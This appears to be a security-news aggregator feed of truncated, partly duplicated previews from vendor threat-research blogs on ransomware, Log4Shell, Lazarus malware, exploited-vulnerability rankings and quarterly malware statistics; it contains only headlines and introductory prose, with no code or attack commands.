The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against evolving
Qualys
Defense Lessons From the Black Basta Ransomware Playbook | Qualys
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook | Qualys
#### Table of Contents
- Know Your Enemys Playbook
- Attackers Move Fast
- How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against ev
Tenable
From Bugs to Breaches: 25 Significant CVEs As MITRE CVE Turns 25
blogs_tenable·2024-10-22
From Bugs to Breaches: 25 Significant CVEs As MITRE CVE Turns 25
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Wiz
Introducing Wiz Code: Transform Your AppSec with Wiz | Wiz Blog
blogs_wiz·2024-09-10
Introducing Wiz Code: Transform Your AppSec with Wiz | Wiz Blog
Today marks the general availability of Wiz Code , the natural next step in the evolution of Wiz and CNAPP to the left!
We have always believed that in order to scale in the cloud, security must be woven into the development lifecycle. That is why we are bringing the trademark precision of Wiz’s cloud security platform to developer environments. Extending our coverage from the first line of code to runtime has already helped our customers in preview transform their AppSec and DevSecOps programs. Now, every other organization can secure their cloud-native applications at every stage of development, protecting their code, CI/CD systems, and infrastructure in one unified platform.
The results are immediate: better security posture for your code and cloud, faster remediation of security issu
Wiz
Introducing Wiz Code: Transform Your AppSec with Wiz | Wiz Blog
blogs_wiz·2024-09-10
Introducing Wiz Code: Transform Your AppSec with Wiz | Wiz Blog
Today marks the general availability of Wiz Code, the natural next step in the evolution of Wiz and CNAPP to the left!
We have always believed that in order to scale in the cloud, security must be woven into the development lifecycle. That is why we are bringing the trademark precision of Wiz’s cloud security platform to developer environments. Extending our coverage from the first line of code to runtime has already helped our customers in preview transform their AppSec and DevSecOps programs. Now, every other organization can secure their cloud-native applications at every stage of development, protecting their code, CI/CD systems, and infrastructure in one unified platform.
The results are immediate: better security posture for your code and cloud, faster remediation of security issue
Zscaler
Key AI Trends: 2024 AI Security Report | Zscaler
blogs_zscaler·2024-03-27
Key AI Trends: 2024 AI Security Report | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Talos
How CVSS 4.0 changes (or doesn’t) the way we see vulnerability severity
blogs_talos·2024-02-21
How CVSS 4.0 changes (or doesn’t) the way we see vulnerability severity
Finding, managing and patching security vulnerabilities on any network, no matter the size, is a tall task.
In the first week of 2024 alone, there were 621 new common IT security vulnerabilities and exposures (CVEs) disclosed worldwide, covering a range of applications, software and hardware that could be on any given network.
Just looking at the raw number of security vulnerabilities that need to be mitigated or patched is going to be overwhelming for any IT team. So, at its most basic level, it’s easy to see why administrators and security researchers are drawn to the appeal of a singular data point that measures how severe a vulnerability is, distilled down to a scale of 0 – 10.
Most casual cybersecurity observers will be familiar with the basic terms like “critical,” “severe” or “mo
Talos
How CVSS 4.0 changes (or doesn’t) the way we see vulnerability severity
blogs_talos·2024-02-21
How CVSS 4.0 changes (or doesn’t) the way we see vulnerability severity
## How CVSS 4.0 changes (or doesn’t) the way we see vulnerability severity
Finding, managing and patching security vulnerabilities on any network, no matter the size, is a tall task.
In the first week of 2024 alone , there were 621 new common IT security vulnerabilities and exposures (CVEs) disclosed worldwide, covering a range of applications, software and hardware that could be on any given network.
Just looking at the raw number of security vulnerabilities that need to be mitigated or patched is going to be overwhelming for any IT team. So, at its most basic level, it’s easy to see why administrators and security researchers are drawn to the appeal of a singular data point that measures how severe a vulnerability is, distilled down to a scale of 0 – 10.
Most casual cybersecurity obs
Talos
Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
blogs_talos·2023-12-11·CVSS 10.0
[CRITICAL] Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
## Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
Cisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation Blacksmith,” employing at least three new DLang -based malware families, two of which are remote access trojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control (C2) communications. We track this Telegram-based RAT as “NineRAT” and the non-Telegram-based RAT as “DLRAT.” We track the DLang-based downloader as “BottomLoader.”
Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group. Over the past year and a half, Talos has disclosed three different remote access trojans (RATs) bui
Talos
Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
blogs_talos·2023-12-11·CVSS 10.0
[CRITICAL] Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
- Cisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation Blacksmith,” employing at least three new DLang-based malware families, two of which are remote access trojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control (C2) communications. We track this Telegram-based RAT as “NineRAT” and the non-Telegram-based RAT as “DLRAT.” We track the DLang-based downloader as “BottomLoader.”
- Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group. Over the past year and a half, Talos has disclosed three different remote access trojans (RATs) built using uncommon technologies in their development, like QtFramework, PowerBasic and, now, DLang.
- Talos has obser
Bleepingcomputer
Lazarus hackers drop new RAT malware using 2-year-old Log4j bug
blogs_bleepingcomputer·2023-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] Lazarus hackers drop new RAT malware using 2-year-old Log4j bug
## Lazarus hackers drop new RAT malware using 2-year-old Log4j bug
## Bill Toulas
The notorious North Korean hacking group known as Lazarus continues to exploit CVE-2021-44228, aka "Log4Shell," this time to deploy three previously unseen malware families written in DLang.
The new malware are two remote access trojans (RATs) named NineRAT and DLRAT and a malware downloader named BottomLoader.
The D programming language is rarely seen in cybercrime operations, so Lazarus probably chose it for new malware development to evade detection.
The campaign, which Cisco Talos researchers codenamed " Operation Blacksmith ," started around March 2023 and targets manufacturing, agricultural, and physical security companies worldwide.
Operation Blacksmith represents a notable shift in tactics and t
Bleepingcomputer
Over 30% of Log4J apps use a vulnerable version of the library
blogs_bleepingcomputer·2023-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] Over 30% of Log4J apps use a vulnerable version of the library
## Over 30% of Log4J apps use a vulnerable version of the library
## Bill Toulas
Roughly 38% of applications using the Apache Log4j library are using a version vulnerable to security issues, including Log4Shell, a critical vulnerability identified as CVE-2021-44228 that carries the maximum severity rating, despite patches being available for more than two years.
Log4Shell is an unauthenticated remote code execution (RCE) flaw that allows taking complete control over systems with Log4j 2.0-beta9 and up to 2.15.0.
The flaw was discovered as an actively exploited zero-day on December 10, 2021, and its widespread impact, ease of exploitation, and massive security implications acted as an open invitation to threat actors.
The circumstance prompted an extensive campaign to notify affected p
Securelist
PC malware statistics, Q3 2023
blogs_securelist·2023-12-01
PC malware statistics, Q3 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2023
- IT threat evolution in Q3 2023. Non-mobile statistics
- IT threat evolution in Q3 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2023:
- Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe.
- A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus
Securelist
IT threat evolution in Q3 2023. Non-mobile statistics
blogs_securelist·2023-12-01
IT threat evolution in Q3 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Vulnerability exploitation
More attacks on healthcare
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT honeypots
Attacks via web resources
Countries and territories that serve as sourc
Tenable
Tenable Research Advisories: Urgent Action
blogs_tenable·2023-11-20
Tenable Research Advisories: Urgent Action
by Cesar Navas November 20, 2023
Tenable Research delivers world class exposure intelligence, data science insights, zero day research and security advisories. Our Security Response Team (SRT) in Tenable Research tracks threat and vulnerability intelligence feeds to make sure our research teams can deliver sensor coverage to our products as quickly as possible. The SRT also works to dig into technical details and author white papers, blogs, and additional communications to ensure stakeholders are fully informed of the latest cyber risks and threats. The SRT provides breakdowns for the latest critical vulnerabilities on the Tenable blog.
When security events rise to the level of taking immediate action, Tenable - leveraging SRT intelligence - notifies customers proactively to provide expo
Zscaler
CVE-2023-47246 | ThreatLabz
blogs_zscaler·2023-11-15·CVSS 9.8
[CRITICAL] CVE-2023-47246 | ThreatLabz
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Trendmicro
Linux-Systeme häufig unter Beschuss
blogs_trendmicro·2023-09-07·CVSS 9.8
[CRITICAL] Linux-Systeme häufig unter Beschuss
Cyberbedrohungen
## Linux-Systeme häufig unter Beschuss
Linux-Report: Alte Sicherheitslücken und neue Technologie stellen Hauptursache für Malware-Infektionen in den Systemen dar. Ransomware-Angriffe häufen sich, aber auch Kryptowährungs-Miner, Webshell-Angriffe und Rootkits.
By: Pawan Kinger Sep 07, 2023 Read time: ( words)
Save to Folio
Linux erfreut sich immer größerer Beliebtheit in der IT-Welt. Vor allem auf Web-Servern und in Rahmen von Embedded-Systemen greifen Unternehmen in der Regel zum Open-Source-Betriebssystem. So laufen etwa 81 Prozent aller Webseiten über Linux und 90 Prozent aller Public-Cloud-Workloads werden mit der Open-Source-Alternative betrieben. Apache, Nginx und viele Dienste auf Amazon Web Services (AWS) sind nur ein kleiner Auszug von populären Linux-basierte
Tenable
AA23-250A: Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475
blogs_tenable·2023-09-07·CVSS 9.8
[CRITICAL] AA23-250A: Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Wiz
Summer '23 Cryptomining Attacks: Analysis + Recommendations | Wiz Blog
blogs_wiz·2023-09-06
Summer '23 Cryptomining Attacks: Analysis + Recommendations | Wiz Blog
During the summer of 2023, Wiz Research detected several different cryptomining incidents targeting cloud workloads. Combining Wiz Runtime Sensor events and information from Wiz agentless scanning, we were able to pinpoint security flaws that led to the attackers’ initial access, assess the scope of the compromised resources, and analyze the attackers’ activities.
Cryptomining stands out as a common threat to cloud workloads since it takes advantage of paid computing resources and yields direct monetary gains for the attackers. The threat actors behind these activities are mostly interested in making quick profits, aiming to spread their opportunistic mining operations as far and as wide as possible. Typically, these attacks aren't very complex or stealthy. The attackers usually look for
Wiz
Summer '23 Cryptomining Attacks: Analysis + Recommendations | Wiz Blog
blogs_wiz·2023-09-06
Summer '23 Cryptomining Attacks: Analysis + Recommendations | Wiz Blog
During the summer of 2023, Wiz Research detected several different cryptomining incidents targeting cloud workloads. Combining Wiz Runtime Sensor events and information from Wiz agentless scanning, we were able to pinpoint security flaws that led to the attackers’ initial access, assess the scope of the compromised resources, and analyze the attackers’ activities.
Cryptomining stands out as a common threat to cloud workloads since it takes advantage of paid computing resources and yields direct monetary gains for the attackers. The threat actors behind these activities are mostly interested in making quick profits, aiming to spread their opportunistic mining operations as far and as wide as possible. Typically, these attacks aren't very complex or stealthy. The attackers usually look for
Qualys
Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Qualys Top 20 Most Exploited Vulnerabilities
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Securelist
IT threat evolution in Q2 2023. Non-mobile statistics
blogs_securelist·2023-08-30
IT threat evolution in Q2 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
MOVEit Transfer vulnerabilities exploited
Attacks on municipal organizations, educational and healthcare establishments
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT
Securelist
PC malware statistics, Q2 2022
blogs_securelist·2023-08-30
PC malware statistics, Q2 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2023
- IT threat evolution in Q2 2023. Non-mobile statistics
- IT threat evolution in Q2 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2023:
- Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe.
- A total of 209,716,810 unique links were d
Qualys
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities | Qualys
blogs_qualys·2023-08-24
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities | Qualys
#### Table of Contents
- References
- Additional Contributor
A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.’s CISA, NSA, and FBI; Canada’s CCCS; U.K.’s NCSC-UK; Australia’s ACSC; and New Zealand’s NCSC-NZ and CERT NZ.
This collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realizatio
Qualys
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities
blogs_qualys·2023-08-24
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities
## Table of Contents
References
Additional Contributor
A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.’s CISA, NSA, and FBI; Canada’s CCCS; U.K.’s NCSC-UK; Australia’s ACSC; and New Zealand’s NCSC-NZ and CERT NZ.
This collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realization tha
Sentinelone
Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
blogs_sentinelone·2023-08-08·CVSS 9.1
[CRITICAL] Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
Leveraging known bugs and unpatched exploits continue to be an unyielding strategy for threat actors. Ranging from security bypasses and credential exposure to remote code execution, software vulnerabilities remain tools of the trade for cyber attackers looking for a way into lucrative systems.
While new flaws found in Active Directory and the MOVEit file transfer application along with those used in the AlienFox toolkit or recent IceFire ransomware campaigns have wreaked havoc this year, a number of existing vulnerabilities stand out from the rest in terms of how often they are abused to this day.
In this post, we delve into CISA’s latest round-up, which lists the top 12 most routinely exploited vulnerabilities of 2022 that continue to pose significant threats to enterprise businesses.
Sentinelone
Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
blogs_sentinelone·2023-08-08·CVSS 9.1
[CRITICAL] Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
Leveraging known bugs and unpatched exploits continue to be an unyielding strategy for threat actors. Ranging from security bypasses and credential exposure to remote code execution, software vulnerabilities remain tools of the trade for cyber attackers looking for a way into lucrative systems.
While new flaws found in Active Directory and the MOVEit file transfer application along with those used in the AlienFox toolkit or recent IceFire ransomware campaigns have wreaked havoc this year, a number of existing vulnerabilities stand out from the rest in terms of how often they are abused to this day.
In this post, we delve into CISA’s latest round-up, which lists the top 12 most routinely exploited vulnerabilities of 2022 that continue to pose significant threats to enterprise businesses.
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
Ransomware Roundup - Cl0p | FortiGuard Labs
blogs_fortinet·2023-07-21·CVSS 9.8
[CRITICAL] Ransomware Roundup - Cl0p | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Ransomware Roundup - Cl0p
By Shunichi Imano and James Slaughter | July 21, 2023
On a bi-weekly basis, FortiGuard Labs gathers data on ransomware variants of interest that have been gaining traction within our datasets and the OSINT community. The Ransomware Roundup report aims to provide readers with brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants.
This edition of the Ransomware Roundup covers the Cl0p ransomware.
Affected platforms: Microsoft Windows, Linux
Impacted parties: Microsoft Windows, Linux Users
Impact: Encrypts and exfiltrates victims’ files and demands ransom for file decryption and not to leak stolen files
Severity level: High
Recently, the Cl0p ransomware group received
Qualys
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
blogs_qualys·2023-07-18
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
## Table of Contents
Top Ten Vulnerabilities Exploited by Threat Actors
Top Ten Highly Active Threat Actors
Top Ten Most Exploited Vulnerabilities by Malware
Top Ten Most Active Malware
Top Ten Vulnerabilities Exploited by Ransomware
Prioritizing Exploited Vulnerabilities with TheQualys VMDR and TruRisk
Assess Your Organizations Exposure to Risk / TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributor
The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of
Sentinelone
TellYouThePass
blogs_sentinelone·2023-07-14
TellYouThePass
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Fortinet
Meet LockBit: The Most Prevalent Ransomware in 2022 | FortiGuard Labs
blogs_fortinet·2023-07-10
Meet LockBit: The Most Prevalent Ransomware in 2022 | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Meet LockBit: The Most Prevalent Ransomware in 2022
By Shunichi Imano and James Slaughter | July 10, 2023
Affected platforms: Microsoft Windows, Linux, ESXi, MacOS
Impacted parties: Microsoft Windows, Linux, ESXi, and MacOS Users
Impact: Encrypts and exfiltrates victims’ files and demands ransom for file decryption and not to leak stolen files
Severity level: High
On June 14th, 2023, the CISA, FBI, MS-ISAC, and multiple international cyber security organizations released a joint advisory for the LockBit ransomware. This ransomware group has been active since early 2020, targeting organizations across numerous industries, including energy and government sectors. According to the advisory, LockBit was the most active ransomware in 2022.
This blog provides
Checkpoint
3rd July – Threat Intelligence Report
blogs_checkpoint·2023-07-03
CVE-2020-12641 3rd July – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 3rd July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 3rd July, please download our Threat_Intelligence Bulletin
TOP ATTACKS AND BREACHES
The LockBit ransomware group has recently claimed responsibility for hacking the Taiwan Semiconductor Manufacturing Company (TSMC), the largest contract chip manufacturer globally, serving tech giants such as Apple and Qualcomm. TSMC denied it was breached by Lockbit, but confirmed that the group has breached one of the company’s I
Securelist
Non-mobile malware statistics, Q1 2023
blogs_securelist·2023-06-07
Non-mobile malware statistics, Q1 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2023
- IT threat evolution in Q1 2023. Non-mobile statistics
- IT threat evolution in Q1 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2023:
- Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.
- Web Anti-Virus detected 246,912,694 unique URLs.
- Attempts to run malware fo
Securelist
IT threat evolution in Q1 2023. Non-mobile statistics
blogs_securelist·2023-06-07
IT threat evolution in Q1 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Attacks on Linux and VMWare ESXi servers
Progress in combating cybercrime
Conti-based Trojan decrypted
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries/territories
Checkpoint
17th April – Threat Intelligence Report
blogs_checkpoint·2023-04-17
CVE-2023-28302 17th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 17th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 17th April, please download our Threat_Intelligence Bulletin
TOP ATTACKS AND BREACHES
Two major automotive manufacturers Hyundai and Toyota have disclosed significant data breaches. Hyundai’s Italian and French car owners were affected, along with individuals who booked a test drive. The leaked data consists of clients’ personal information including emails, addresses, phone numbers, and vehicle chassis numbers.
Qualys
What’s Next After Log4Shell?
blogs_qualys·2023-02-22·CVSS 10.0
CVE-2021-44228 [CRITICAL] What’s Next After Log4Shell?
## Table of Contents
How To Deal With the Next Open-Source Vulnerability Using Custom Scripts
Qualys CAR is your most effective scripting solution to augment your current vulnerabilities scans
Augment Your Detection QIDs With Qualys CAR
Evaluate Your Compliance Posture Using Script-Based, User-Defined Controls (UDCs)
Learn More:
## How To Deal With the Next Open-Source Vulnerability Using Custom Scripts
A critical vulnerability in Apache’s Log4j Java-based logging utility (CVE-2021-44228) was previously referred to as the “most critical vulnerability of the last decade.”
In the wake of Log4Shell exploits, many security professionals are concerned about the next potential open-source vulnerability. The ubiquitous nature of open-source libraries makes this threat viable and dangerous
Qualys
What’s Next After Log4Shell? | Qualys
blogs_qualys·2023-02-22·CVSS 10.0
[CRITICAL] What’s Next After Log4Shell? | Qualys
#### Table of Contents
- How To Deal With the Next Open-Source Vulnerability Using Custom Scripts
- Qualys CAR is your most effective scripting solution to augment your current vulnerabilities scans
- Augment Your Detection QIDs With Qualys CAR
- Evaluate Your Compliance Posture Using Script-Based, User-Defined Controls (UDCs)
- Learn More:
## How To Deal With the Next Open-Source Vulnerability Using Custom Scripts
A critical vulnerability in Apache’s Log4j Java-based logging utility (CVE-2021-44228) was previously referred to as the “most critical vulnerability of the last decade.”
In the wake of Log4Shell exploits, many security professionals are concerned about the next potential open-source vulnerability. The ubiquitous nature of open-source libraries makes this threat viable and d
Tenable
South Korean and American Agencies Release Joint Advisory on North Korean Ransomware
blogs_tenable·2023-02-16
South Korean and American Agencies Release Joint Advisory on North Korean Ransomware
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
